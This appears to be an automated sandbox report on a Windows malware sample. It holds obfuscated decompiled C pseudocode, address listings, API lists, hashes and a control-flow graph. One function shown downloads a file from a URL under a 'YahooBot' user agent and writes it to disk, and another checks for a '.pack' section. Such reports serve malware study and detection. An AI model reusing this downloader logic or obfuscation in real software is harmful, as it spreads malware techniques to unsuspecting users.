																_t174 = 0x4cfc89e6;
																 *(_t367 + 4) = 0;
																if(0x4cfc89e6 > 0xfed62cf2) {
																	continue;
																} else {
																	goto L11;
																}
															}
														}
													}
													goto L50;
												}
												if(_t174 > 0x7eca3339) {
													if(_t174 == 0x7eca333a) {
														_t174 = 0x6f370a24;
														if(0x6f370a24 > 0xfed62cf2) {
															continue;
														} else {
															goto L11;
														}
														goto L82;
													} else {
														if(_t174 != 0x7feac9c0) {
															goto L3;
														} else {
															_t364 = 0;
															 *((intOrPtr*)(_t367 + 0x1c)) =  *((intOrPtr*)(_t367 + 0x14)) + 4;
															 *((intOrPtr*)(_t367 + 0x20)) =  *((intOrPtr*)(_t367 + 0x10)) + ( *( *((intOrPtr*)(_t367 + 0x1c)) + 0x10) & 0x0000ffff) + 0x18;
															_t174 = 0xaa12fd1e;
															if(0xaa12fd1e > 0xfed62cf2) {
																continue;
															} else {
																asm("o16 nop [eax+eax]");
																goto L11;
															}
														}
													}
													goto L50;
												}
												if(_t174 == 0x6c45805e) {
													_t322 =  *(_t367 + 0x3c);
													_t174 =  !=  ? 0xd735422 : 0x8dde7434;
													 *(_t367 + 8) = _t322;
													if(0x8dde7434 > 0xfed62cf2) {
														continue;
													} else {
														goto L11;
													}
													goto L82;
												}
												goto L50;
											}
											if(_t174 > 0xd735421) {
												if(_t174 == 0xd735422) {
													_t174 = 0x8dde7434;
													 *(_t367 + 8) = 0;
													if(0x8dde7434 > 0xfed62cf2) {
														goto L4;
													} else {
														continue;
													}
													goto L82;
												} else {
													if(_t174 == 0x1ccde1a2) {
														_t174 = 0xa2b96734;
														asm("o16 nop [cs:eax+eax]");
														goto L3;
													} else {
														if(_t174 != 0x319cc50d) {
															goto L3;
														} else {
															_t174 =  !=  ? 0xc7bdfb42 : 0xa58778e5;
															if(0xa58778e5 > 0xfed62cf2) {
																goto L4;
															} else {
																continue;
															}
														}
													}
												}
											} else {
												if(_t174 == 0xfed62cf3) {
													_t244 =  *0x984918; // 0x0
													_t347 = 0xe33d737b;
													_t71 = _t244 - 1; // -1
													_t322 =  !(_t71 * _t244) | 0xfffffffe;
													_t361 =  !=  ? 0xe33d737b : 0x84c325e;
													_t249 =  ==  ? 0xe33d737b : 0x84c325e;
													_t174 =  >=  ? 0x84c325e :  ==  ? 0xe33d737b : 0x84c325e;
													if(0x84c325e > 0xfed62cf2) {
														goto L4;
													} else {
														continue;
													}
													goto L82;
												} else {
													if(_t174 == 0x84c325e) {
														 *(_t367 + 0x53) = 0x8a00b7b7;
														 *(_t367 + 0x50) = 0xb7781caf;
														 *(_t367 + 0x4c) = 0x5899deb1;
														 *(_t367 + 0x48) = 0x7d69c289;
														 *(_t367 + 0x44) = 0x3d9ca10;
														_push( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)));
														_t250 = E00972CB7();
														_t375 = _t367 + 4;
														_t361 = _t250;
														E009710E0(_t361,  *((intOrPtr*)( *((intOrPtr*)(_t375 + 0x24)) + 0xc)) +  *((intOrPtr*)(_t375 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)));
														_t376 = _t375 + 0xc;
														E00952B40(_t361,  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x24)) + 0x10)), _t376 + 0x48, 0x13);
														_t377 = _t376 + 0x10;
														_t316 =  *(_t377 + 0x70);
														 *_t316 =  *_t361 & 0x000000ff;
														_t274 = _t316;
														_t258 = _t361[1] & 0x000000ff;
														_t318 = (_t361[2] & 0x000000ff) << 8;
														_t347 = _t318 + _t258;
														_push(_t318 + _t258 + 2);
														_t260 = E00972CB7();
														 *((intOrPtr*)(_t274 + 4)) = _t260;
														_t98 =  &(_t361[3]); // 0x3
														 *((short*)(_t260 + _t347)) = 0;
														E009710E0(_t260, _t98, _t347);
														_t367 = _t377 + 0x10;
														 *(_t274 + 8) = _t361[_t347 + 3] & 0x000000ff;
														_t174 = 0xe33d737b;
														if(0xe33d737b > 0xfed62cf2) {
															goto L4;
														} else {
															continue;
														}
														goto L82;
													} else {
														if(_t174 != 0x8c38113) {
															goto L3;
														} else {
															_t263 =  *0x984918; // 0x0
															_t320 =  *0x98491c; // 0x0
															_t347 = 0x8278cfc9;
															_t27 = _t263 - 1; // -1
															_t274 = ((_t274 & 0xffffff00 | ((_t27 * _t263 ^ 0xfffffffe) & _t27 * _t263) == 0x00000000) & 0xffffff00 | _t320 - 0x0000000a < 0x00000000) ^ ((_t274 & 0xffffff00 | ((_t27 * _t263 ^ 0xfffffffe) & _t27 * _t263) == 0x00000000) & 0xffffff00 | _t320 - 0x0000000a < 0x00000000);
															_t361 =  !=  ? 0x8278cfc9 : 0x33134b11;
															_t322 =  *_t367;
															_t267 =  ==  ? 0x8278cfc9 : 0x33134b11;
															_t174 =  >=  ? 0x33134b11 :  ==  ? 0x8278cfc9 : 0x33134b11;
															 *(_t367 + 0x3c) = _t322;
															if(0x33134b11 > 0xfed62cf2) {
																goto L4;
															} else {
																continue;
															}
														}
													}
												}
											}
										} else {
											continue;
										}
									}
								}
							}
						}
						L50:
						if(_t174 != 0x6f370a24) {
							goto L3;
						}
						goto L82;
					}
					if(_t174 > 0xa2b96733) {
						if(_t174 == 0xa2b96734) {
							_t221 =  *0x984918; // 0x0
							_t110 = _t221 - 1; // -1
							 *((char*)(_t367 + 0x37)) =  *(_t367 + 0x40) == 0;
							_t223 =  ==  ? 0xa7c7173e : 0x1ccde1a2;
							_t224 =  >=  ? 0x1ccde1a2 :  ==  ? 0xa7c7173e : 0x1ccde1a2;
							_t322 = (_t322 & 0xffffff00 |  *0x98491c - 0x0000000a < 0x00000000) ^ (( !(_t110 * _t221) | 0xfffffffe) & 0xffffff00 | ( !(_t110 * _t221) | 0xfffffffe) == 0xffffffff);
							_t174 =  !=  ? 0xa7c7173e :  >=  ? 0x1ccde1a2 :  ==  ? 0xa7c7173e : 0x1ccde1a2;
							if(0x1ccde1a2 > 0xfed62cf2) {
								goto L4;
							} else {
								goto L11;
							}
							goto L82;
						} else {
							if(_t174 == 0xa58778e5) {
								_t174 = 0x4cfc89e6;
								 *(_t367 + 4) = 1;
								if(0x4cfc89e6 > 0xfed62cf2) {
									goto L4;
								} else {
									goto L11;
								}
								goto L82;
							} else {
								if(_t174 != 0xa7c7173e) {
									goto L3;
								} else {
									_t174 =  !=  ? 0x7eca333a : 0x6f370a24;
									if(0x6f370a24 > 0xfed62cf2) {
										goto L4;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						if(_t174 == 0x8278cfc9) {
							_t359 =  !=  ? 0x6c45805e : 0x33134b11;
							_t322 =  *(_t367 + 0x3c);
							_t232 =  ==  ? 0x6c45805e : 0x33134b11;
							_t174 =  >=  ? 0x33134b11 :  ==  ? 0x6c45805e : 0x33134b11;
							 *((char*)(_t367 + 0x36)) = _t322 == 2;
							if(0x33134b11 > 0xfed62cf2) {
								goto L4;
							} else {
								goto L11;
							}
							goto L82;
						} else {
							if(_t174 == 0x8dde7434) {
								_t347 = 0xa2b96734;
								_t361 =  !=  ? 0xa2b96734 : 0x1ccde1a2;
								_t322 =  *(_t367 + 8);
								_t238 =  ==  ? 0xa2b96734 : 0x1ccde1a2;
								_t174 =  >=  ? 0x1ccde1a2 :  ==  ? 0xa2b96734 : 0x1ccde1a2;
								 *(_t367 + 0x40) = _t322;
								if(0x1ccde1a2 > 0xfed62cf2) {
									goto L4;
								} else {
									goto L11;
								}
								goto L82;
							} else {
								if(_t174 != 0x99f22e0b) {
									goto L3;
								} else {
									 *((intOrPtr*)(_t367 + 0x24)) =  *((intOrPtr*)(_t367 + 0x20)) + ( *(_t367 + 0x38) +  *(_t367 + 0x38) * 4) * 8;
									lstrcmpA( *(_t367 + 0x28), ".pack"); // executed
									_t205 = 0x59fb82a3;
									_t287 = 0xfed62cf3;
									goto L78;
								}
							}
						}
					}
					goto L50;
				}
				goto L4;
			}









































                                                                                                                              0x00951007
                                                                                                                              0x0095100e
                                                                                                                              0x00951014
                                                                                                                              0x0095101a
                                                                                                                              0x00951025
                                                                                                                              0x0095102d
                                                                                                                              0x00951037
                                                                                                                              0x0095103b
                                                                                                                              0x00951045
                                                                                                                              0x00000000
                                                                                                                              0x009510d0
                                                                                                                              0x009511c5
                                                                                                                              0x00951340
                                                                                                                              0x0095167f
                                                                                                                              0x00951689
                                                                                                                              0x0095168d
                                                                                                                              0x00951694
                                                                                                                              0x0095169b
                                                                                                                              0x009516a2
                                                                                                                              0x009516a9
                                                                                                                              0x009516b3
                                                                                                                              0x009516b6
                                                                                                                              0x009516bb
                                                                                                                              0x009516be
                                                                                                                              0x009516d5
                                                                                                                              0x009516da
                                                                                                                              0x009516e7
                                                                                                                              0x009516ec
                                                                                                                              0x009516f3
                                                                                                                              0x009516fa
                                                                                                                              0x0095171b
                                                                                                                              0x00951728
                                                                                                                              0x00951732
                                                                                                                              0x0095173d
                                                                                                                              0x00951748
                                                                                                                              0x0095174f
                                                                                                                              0x00951754
                                                                                                                              0x00951764
                                                                                                                              0x00951769
                                                                                                                              0x0095177e
                                                                                                                              0x00951783
                                                                                                                              0x00951788
                                                                                                                              0x0095178d
                                                                                                                              0x00951792
                                                                                                                              0x009517a7
                                                                                                                              0x009517b4
                                                                                                                              0x009517b7
                                                                                                                              0x009517b9
                                                                                                                              0x009517c1
                                                                                                                              0x00000000
                                                                                                                              0x009517c7
                                                                                                                              0x00000000
                                                                                                                              0x009517c7
                                                                                                                              0x00000000
                                                                                                                              0x00951346
                                                                                                                              0x0095134b
                                                                                                                              0x009517d0
                                                                                                                              0x009517da
                                                                                                                              0x00000000
                                                                                                                              0x00951351
                                                                                                                              0x00951356
                                                                                                                              0x00000000
                                                                                                                              0x0095135c
                                                                                                                              0x00951360
                                                                                                                              0x00951365
                                                                                                                              0x0095136b
                                                                                                                              0x00000000
                                                                                                                              0x00951371
                                                                                                                              0x00000000
                                                                                                                              0x00951371
                                                                                                                              0x0095136b
                                                                                                                              0x00951356
                                                                                                                              0x0095134b
                                                                                                                              0x009511cb
                                                                                                                              0x009511d0
                                                                                                                              0x0095156d
                                                                                                                              0x00951571
                                                                                                                              0x00951589
                                                                                                                              0x00951591
                                                                                                                              0x00000000
                                                                                                                              0x00951597
                                                                                                                              0x00000000
                                                                                                                              0x00951597
                                                                                                                              0x00000000
                                                                                                                              0x009511d6
                                                                                                                              0x009511db
                                                                                                                              0x0095159c
                                                                                                                              0x009515a1
                                                                                                                              0x009515ad
                                                                                                                              0x00000000
                                                                                                                              0x009515b3
                                                                                                                              0x00000000
                                                                                                                              0x009515b3
                                                                                                                              0x00000000
                                                                                                                              0x009511e1
                                                                                                                              0x009511e6
                                                                                                                              0x00951060
                                                                                                                              0x00951065
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009511ec
                                                                                                                              0x009511f4
                                                                                                                              0x0095120e
                                                                                                                              0x00951222
                                                                                                                              0x00951227
                                                                                                                              0x00951228
                                                                                                                              0x0095122d
                                                                                                                              0x00951230
                                                                                                                              0x00951236
                                                                                                                              0x0095123a
                                                                                                                              0x0095123f
                                                                                                                              0x00951244
                                                                                                                              0x00951256
                                                                                                                              0x0095125b
                                                                                                                              0x0095125e
                                                                                                                              0x00951268
                                                                                                                              0x00000000
                                                                                                                              0x00951067
                                                                                                                              0x00951077
                                                                                                                              0x00951278
                                                                                                                              0x009515bc
                                                                                                                              0x009515c6
                                                                                                                              0x00000000
                                                                                                                              0x009515cc
                                                                                                                              0x00000000
                                                                                                                              0x009515cc
                                                                                                                              0x00000000
                                                                                                                              0x0095127e
                                                                                                                              0x00951283
                                                                                                                              0x009515d1
                                                                                                                              0x009515d5
                                                                                                                              0x009515da
                                                                                                                              0x009515e1
                                                                                                                              0x009517df
                                                                                                                              0x009517df
                                                                                                                              0x009517e7
                                                                                                                              0x00000000
                                                                                                                              0x009517ed
                                                                                                                              0x00000000
                                                                                                                              0x009517ed
                                                                                                                              0x0095181c
                                                                                                                              0x00951822
                                                                                                                              0x00951833
                                                                                                                              0x00951289
                                                                                                                              0x0095128e
                                                                                                                              0x00000000
                                                                                                                              0x00951294
                                                                                                                              0x00951294
                                                                                                                              0x00951299
                                                                                                                              0x009512a6
                                                                                                                              0x00000000
                                                                                                                              0x009512ac
                                                                                                                              0x00000000
                                                                                                                              0x009512ac
                                                                                                                              0x009512a6
                                                                                                                              0x0095128e
                                                                                                                              0x00951283
                                                                                                                              0x00000000
                                                                                                                              0x00951278
                                                                                                                              0x00951082
                                                                                                                              0x0095108d
                                                                                                                              0x00951391
                                                                                                                              0x0095139b
                                                                                                                              0x00000000
                                                                                                                              0x009513a1
                                                                                                                              0x00000000
                                                                                                                              0x009513a1
                                                                                                                              0x00000000
                                                                                                                              0x00951093
                                                                                                                              0x00951098
                                                                                                                              0x00000000
                                                                                                                              0x0095109a
                                                                                                                              0x009510a2
                                                                                                                              0x009510a7
                                                                                                                              0x009510b7
                                                                                                                              0x009510bb
                                                                                                                              0x009510c5
                                                                                                                              0x00000000
                                                                                                                              0x009510c7
                                                                                                                              0x009510c7
                                                                                                                              0x00000000
                                                                                                                              0x009510c7
                                                                                                                              0x009510c5
                                                                                                                              0x00951098
                                                                                                                              0x00000000
                                                                                                                              0x0095108d
                                                                                                                              0x0095137b
                                                                                                                              0x009517f7
                                                                                                                              0x00951805
                                                                                                                              0x00951808
                                                                                                                              0x00951811
                                                                                                                              0x00000000
                                                                                                                              0x00951817
                                                                                                                              0x00000000
                                                                                                                              0x00951817
                                                                                                                              0x00000000
                                                                                                                              0x00951811
                                                                                                                              0x00000000
                                                                                                                              0x0095137b
                                                                                                                              0x00951145
                                                                                                                              0x009512fd
                                                                                                                              0x0095165e
                                                                                                                              0x00951663
                                                                                                                              0x00951670
                                                                                                                              0x00000000
                                                                                                                              0x00951676
                                                                                                                              0x00000000
                                                                                                                              0x00951676
                                                                                                                              0x00000000
                                                                                                                              0x00951303
                                                                                                                              0x00951308
                                                                                                                              0x00951050
                                                                                                                              0x00951055
                                                                                                                              0x00000000
                                                                                                                              0x0095130e
                                                                                                                              0x00951313
                                                                                                                              0x00000000
                                                                                                                              0x00951319
                                                                                                                              0x00951328
                                                                                                                              0x00951330
                                                                                                                              0x00000000
                                                                                                                              0x00951336
                                                                                                                              0x00000000
                                                                                                                              0x00951336
                                                                                                                              0x00951330
                                                                                                                              0x00951313
                                                                                                                              0x00951308
                                                                                                                              0x0095114b
                                                                                                                              0x00951150
                                                                                                                              0x00951458
                                                                                                                              0x00951468
                                                                                                                              0x0095146d
                                                                                                                              0x00951475
                                                                                                                              0x00951486
                                                                                                                              0x0095148e
                                                                                                                              0x00951494
                                                                                                                              0x0095149c
                                                                                                                              0x00000000
                                                                                                                              0x009514a2
                                                                                                                              0x00000000
                                                                                                                              0x009514a2
                                                                                                                              0x00000000
                                                                                                                              0x00951156
                                                                                                                              0x0095115b
                                                                                                                              0x009514a7
                                                                                                                              0x009514af
                                                                                                                              0x009514b7
                                                                                                                              0x009514bf
                                                                                                                              0x009514c7
                                                                                                                              0x009514d3
                                                                                                                              0x009514d6
                                                                                                                              0x009514db
                                                                                                                              0x009514de
                                                                                                                              0x009514f8
                                                                                                                              0x009514fd
                                                                                                                              0x0095150b
                                                                                                                              0x00951510
                                                                                                                              0x00951513
                                                                                                                              0x0095151a
                                                                                                                              0x0095151c
                                                                                                                              0x00951522
                                                                                                                              0x00951526
                                                                                                                              0x00951529
                                                                                                                              0x00951530
                                                                                                                              0x00951531
                                                                                                                              0x00951539
                                                                                                                              0x0095153c
                                                                                                                              0x0095153f
                                                                                                                              0x00951548
                                                                                                                              0x0095154d
                                                                                                                              0x00951555
                                                                                                                              0x00951558
                                                                                                                              0x00951562
                                                                                                                              0x00000000
                                                                                                                              0x00951568
                                                                                                                              0x00000000
                                                                                                                              0x00951568
                                                                                                                              0x00000000
                                                                                                                              0x00951161
                                                                                                                              0x00951166
                                                                                                                              0x00000000
                                                                                                                              0x0095116c
                                                                                                                              0x0095116c
                                                                                                                              0x00951171
                                                                                                                              0x0095117c
                                                                                                                              0x00951181
                                                                                                                              0x00951197
                                                                                                                              0x00951199
                                                                                                                              0x0095119e
                                                                                                                              0x009511a3
                                                                                                                              0x009511a9
                                                                                                                              0x009511ac
                                                                                                                              0x009511b5
                                                                                                                              0x00000000
                                                                                                                              0x009511bb
                                                                                                                              0x00000000
                                                                                                                              0x009511bb
                                                                                                                              0x009511b5
                                                                                                                              0x00951166
                                                                                                                              0x0095115b
                                                                                                                              0x00951150
                                                                                                                              0x0095126e
                                                                                                                              0x00000000
                                                                                                                              0x0095126e
                                                                                                                              0x00951268
                                                                                                                              0x009511e6
                                                                                                                              0x009511db
                                                                                                                              0x009511d0
                                                                                                                              0x00951381
                                                                                                                              0x00951386
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0095138c
                                                                                                                              0x009510e0
                                                                                                                              0x009512b6
                                                                                                                              0x009515ee
                                                                                                                              0x009515fd
                                                                                                                              0x00951600
                                                                                                                              0x00951618
                                                                                                                              0x00951625
                                                                                                                              0x00951628
                                                                                                                              0x0095162a
                                                                                                                              0x00951632
                                                                                                                              0x00000000
                                                                                                                              0x00951638
                                                                                                                              0x00000000
                                                                                                                              0x00951638
                                                                                                                              0x00000000
                                                                                                                              0x009512bc
                                                                                                                              0x009512c1
                                                                                                                              0x00951641
                                                                                                                              0x00951646
                                                                                                                              0x00951653
                                                                                                                              0x00000000
                                                                                                                              0x00951659
                                                                                                                              0x00000000
                                                                                                                              0x00951659
                                                                                                                              0x00000000
                                                                                                                              0x009512c7
                                                                                                                              0x009512cc
                                                                                                                              0x00000000
                                                                                                                              0x009512d2
                                                                                                                              0x009512e1
                                                                                                                              0x009512ed
                                                                                                                              0x00000000
                                                                                                                              0x009512f3
                                                                                                                              0x00000000
                                                                                                                              0x009512f3
                                                                                                                              0x009512ed
                                                                                                                              0x009512cc
                                                                                                                              0x009512c1
                                                                                                                              0x009510e6
                                                                                                                              0x009510eb
                                                                                                                              0x009513d4
                                                                                                                              0x009513da
                                                                                                                              0x009513e0
                                                                                                                              0x009513e6
                                                                                                                              0x009513ec
                                                                                                                              0x009513f6
                                                                                                                              0x00000000
                                                                                                                              0x009513fc
                                                                                                                              0x00000000
                                                                                                                              0x009513fc
                                                                                                                              0x00000000
                                                                                                                              0x009510f1
                                                                                                                              0x009510f6
                                                                                                                              0x00951411
                                                                                                                              0x0095142f
                                                                                                                              0x00951435
                                                                                                                              0x0095143b
                                                                                                                              0x00951441
                                                                                                                              0x00951444
                                                                                                                              0x0095144d
                                                                                                                              0x00000000
                                                                                                                              0x00951453
                                                                                                                              0x00000000
                                                                                                                              0x00951453
                                                                                                                              0x00000000
                                                                                                                              0x009510fc
                                                                                                                              0x00951101
                                                                                                                              0x00000000
                                                                                                                              0x00951107
                                                                                                                              0x00951115
                                                                                                                              0x00951122
                                                                                                                              0x0095112a
                                                                                                                              0x0095112f
                                                                                                                              0x00000000
                                                                                                                              0x0095112f
                                                                                                                              0x00951101
                                                                                                                              0x009510f6
                                                                                                                              0x009510eb
                                                                                                                              0x00000000
                                                                                                                              0x009510e0
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00951014
                                                                                                                              • lstrcmpA.KERNEL32(?,.pack,?), ref: 00951122
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModulelstrcmp
                                                                                                                              • String ID: !Ts$"Ts$"Ts$$7o$$7o$$7o$.pack$rRb$rRb$zs=${s=${s=${s=
                                                                                                                              • API String ID: 4066981444-4031373015
                                                                                                                              • Opcode ID: f27bcfd8a6c5c4e1ab5fd323be8f30786026b5e9e7846e7b7e3a5c28b6e9d91f
                                                                                                                              • Instruction ID: b3aed4b1ef06acd2118b84de365a3bd6e7b391871af84bf2b75a1062698582ea
                                                                                                                              • Opcode Fuzzy Hash: f27bcfd8a6c5c4e1ab5fd323be8f30786026b5e9e7846e7b7e3a5c28b6e9d91f
                                                                                                                              • Instruction Fuzzy Hash: B512E1756083808BC724CF2A9895B2AB7E1AFC9351F25491DFC59CB3A0D736CD89DB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00952750 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 227networkfileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 243 952750-95278a InternetOpenW 244 95278c 243->244 245 9527b8-9527be 243->245 248 952820-952826 244->248 246 9527c4-9527ca 245->246 247 952890-952896 245->247 249 9529b4-9529ba 246->249 250 9527d0-9527d6 246->250 253 952a60-952a97 247->253 254 95289c-9528a2 247->254 251 952940-952946 248->251 252 95282c-952832 248->252 264 9529c0-9529c6 249->264 265 952afc-952b06 249->265 257 9529d1-952a0d InternetReadFile WriteFile 250->257 258 9527dc-9527e2 250->258 259 95294c-952952 251->259 260 952acb-952af1 CloseHandle 251->260 262 952a18-952a2f InternetCloseHandle 252->262 263 952838-95283e 252->263 253->245 261 952a9d 253->261 255 952aa2-952aac 254->255 256 9528a8-9528ae 254->256 275 952ab3-952ac0 255->275 276 952aae 255->276 267 9528b4-952902 CreateFileW 256->267 268 9527b0-9527b6 256->268 257->245 266 952a13 257->266 258->268 272 9527e4-95280b InternetOpenUrlW 258->272 273 952791-9527ad InternetCloseHandle 259->273 274 952958-95295e 259->274 260->245 280 952af7 260->280 261->255 262->245 271 952a35 262->271 277 952844-95284a 263->277 278 952a3a-952a44 263->278 264->268 279 9529cc-952b3b call 96fb8d 264->279 269 952b0d-952b15 265->269 270 952b08 265->270 266->248 281 952904 267->281 282 952909-95292b 267->282 268->245 268->248 269->245 283 952b1b 269->283 270->269 271->248 287 952812-95281a 272->287 288 95280d 272->288 273->268 274->268 284 952964-952991 274->284 275->245 289 952ac6 275->289 276->275 277->268 290 952850-95287a CreateFileW 277->290 278->268 286 952a4a-952a55 278->286 280->248 281->282 282->245 291 952931 282->291 283->248 295 952993 284->295 296 952998-9529a9 284->296 286->245 293 952a5b 286->293 287->245 294 95281c 287->294 288->287 289->260 290->245 297 952880 290->297 291->248 293->248 294->248 295->296 296->245 299 9529af 296->299 297->248 299->248
                                                                                                                              C-Code - Quality: 71%
                                                                                                                              			E00952750(signed int __edx) {
				WCHAR* _v12;
				WCHAR* _v16;
				signed int _v20;
				signed int _v40;
				char _v2088;
				void* _v2092;
				void** _v2096;
				DWORD* _v2100;
				char _v2101;
				void* _v2108;
				void* _v2112;
				void* _v2116;
				long _v2120;
				void* _v2124;
				long _v2136;
				long _v2140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				void* _t54;
				void* _t62;
				void* _t71;
				signed int _t72;
				void* _t76;
				void* _t82;
				signed int _t83;
				signed int _t89;
				signed int _t97;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				signed int _t103;

				_t97 = __edx;
				_t103 =  &_v2092;
				_t52 =  *0x984000; // 0xd51acdcc
				_v20 = _t52 ^ _t103;
				_t54 = InternetOpenW(L"YahooBot", 0, 0, 0, 0); // executed
				_t82 = 0x2534d32a;
				_v2116 = _t54;
				if(0x2534d32a > 0x22947b52) {
					L4:
					while(_t82 > 0x5b246c3c) {
						if(_t82 <= 0x7b0c908c) {
							if(_t82 == 0x5b246c3d) {
								_t82 = 0x22947b53;
								if(_v2101 == 0) {
									_t82 = 0xa2a0db67;
								}
								_t99 = 0;
								if(_t82 > 0x22947b52) {
									continue;
								}
								L12:
								while(_t82 <= 0xd767448a) {
									if(_t82 == 0xa2a0db67) {
										_t73 = InternetCloseHandle(_v2112); // executed
										_t82 = 0xdd655825;
										_t100 = _t99;
										if(0xdd655825 > 0x22947b52) {
											goto L4;
										}
										continue;
									}
									if(_t82 == 0xb5996342) {
										_t82 = 0xd767448b;
										if(_v2120 == 0) {
											L3:
											if(_t82 <= 0x22947b52) {
												continue;
											}
											goto L4;
										}
										_t82 = 0x7b0c908d;
										if(0x7b0c908d > 0x22947b52) {
											goto L4;
										}
										continue;
									}
									if(_t82 != 0xbe1a2714) {
										goto L3;
									}
									_t73 = CreateFileW(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
									_t82 = 0x5298324d;
									if(0x5298324d > 0x22947b52) {
										goto L4;
									}
								}
								if(_t82 == 0xd767448b) {
									CloseHandle(_v2108);
									_t82 = 0xa2a0db67;
									_t99 = 1;
									if(0xa2a0db67 > 0x22947b52) {
										continue;
									}
									goto L12;
								}
								if(_t82 == 0xdd655825) {
									InternetCloseHandle(_v2116);
									_t82 = 0x63b192fb;
									 *_t103 = _t100;
									asm("o16 nop [cs:eax+eax]");
									goto L3;
								}
								if(_t82 != 0xfafa931e) {
									goto L3;
								}
								_t83 =  *0x984918; // 0x0
								_t72 =  *0x98491c; // 0x0
								_t101 = 0x5298324d;
								_t18 = _t83 - 1; // -1
								_t97 = _t18 * _t83;
								_t77 = _t97 ^ 0xfffffffe;
								if((((_t83 & 0xffffff00 | ((_t97 ^ 0xfffffffe) & _t97) == 0x00000000) & 0xffffff00 | _t72 - 0x0000000a < 0x00000000) ^ ((_t83 & 0xffffff00 | ((_t97 ^ 0xfffffffe) & _t97) == 0x00000000) & 0xffffff00 | _t72 - 0x0000000a < 0x00000000)) == 0) {
									_t101 = 0xbe1a2714;
								}
								_t88 =  !=  ? _t101 : 0x5298324d;
								_t82 =  >=  ? _t101 :  !=  ? _t101 : 0x5298324d;
								if(_t82 > 0x22947b52) {
									continue;
								} else {
									goto L12;
								}
							}
							if(_t82 != 0x63b192fb) {
								goto L3;
							}
							E0096FB8D(_t73, _t77, _v40 ^ _t103, _t97, _t99, _t100);
							return  *_t103;
						}
						if(_t82 == 0x7b0c908d) {
							_t62 =  &_v2088;
							_t77 = _t62;
							InternetReadFile(_v2112, _t62, 0x800,  &_v2120); // executed
							WriteFile(_v2124, _t62, _v2136,  &_v2140, 0); // executed
							_t82 = 0xb5996342;
							if(0xb5996342 > 0x22947b52) {
								continue;
							}
							goto L12;
						}
						if(_t82 != 0x7bc53a90) {
							goto L3;
						}
						_t71 = InternetOpenUrlW(_v2116, _v16, 0, 0, 0, 0); // executed
						_v2136 = _t71;
						_t82 = 0xdd655825;
						if(_v2136 != 0) {
							_t82 = 0xfafa931e;
						}
						_t100 = 0;
						if(_t82 > 0x22947b52) {
							continue;
						} else {
							goto L12;
						}
					}
					if(_t82 == 0x22947b53) {
						_t82 = 0xb5996342;
						_v2100 =  &_v2120;
						_v2120 = 0xffffffff;
						_v2096 =  &_v2124;
						_v2092 =  &_v2088;
						if(0xb5996342 > 0x22947b52) {
							goto L4;
						}
						goto L12;
					}
					if(_t82 == 0x2534d32a) {
						_t82 = 0x63b192fb;
						if(_v2116 != 0) {
							_t82 = 0x7bc53a90;
						}
						 *_t103 = 0;
						if(_t82 > 0x22947b52) {
							goto L4;
						}
						goto L12;
					}
					if(_t82 != 0x5298324d) {
						goto L3;
					}
					_t76 = CreateFileW(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					_t89 =  *0x984918; // 0x0
					_t97 =  *0x98491c; // 0x0
					_t102 = 0x5b246c3d;
					_t10 = _t89 - 1; // -1
					_t77 =  !(_t10 * _t89) | 0xfffffffe;
					if((((_t89 & 0xffffff00 | ( !(_t10 * _t89) | 0xfffffffe) == 0xffffffff) & 0xffffff00 | _t97 - 0x0000000a < 0x00000000) ^ ((_t89 & 0xffffff00 | ( !(_t10 * _t89) | 0xfffffffe) == 0xffffffff) & 0xffffff00 | _t97 - 0x0000000a < 0x00000000)) == 0) {
						_t102 = 0xbe1a2714;
					}
					_v2108 = _t76;
					_t73 = _v2108;
					_t94 =  !=  ? _t102 : 0x5b246c3d;
					_t82 =  >=  ? _t102 :  !=  ? _t102 : 0x5b246c3d;
					_v2101 = _v2108 != 0xffffffff;
					if(_t82 > 0x22947b52) {
						goto L4;
					} else {
						goto L12;
					}
				}
				goto L12;
			}





































                                                                                                                              0x00952750
                                                                                                                              0x00952754
                                                                                                                              0x0095275a
                                                                                                                              0x00952761
                                                                                                                              0x00952775
                                                                                                                              0x0095277b
                                                                                                                              0x00952780
                                                                                                                              0x0095278a
                                                                                                                              0x00000000
                                                                                                                              0x009527b8
                                                                                                                              0x009527ca
                                                                                                                              0x009529ba
                                                                                                                              0x00952b01
                                                                                                                              0x00952b06
                                                                                                                              0x00952b08
                                                                                                                              0x00952b08
                                                                                                                              0x00952b0d
                                                                                                                              0x00952b15
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952820
                                                                                                                              0x00952832
                                                                                                                              0x00952a1c
                                                                                                                              0x00952a22
                                                                                                                              0x00952a27
                                                                                                                              0x00952a2f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952a35
                                                                                                                              0x0095283e
                                                                                                                              0x00952a3f
                                                                                                                              0x00952a44
                                                                                                                              0x009527b0
                                                                                                                              0x009527b6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009527b6
                                                                                                                              0x00952a4a
                                                                                                                              0x00952a55
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
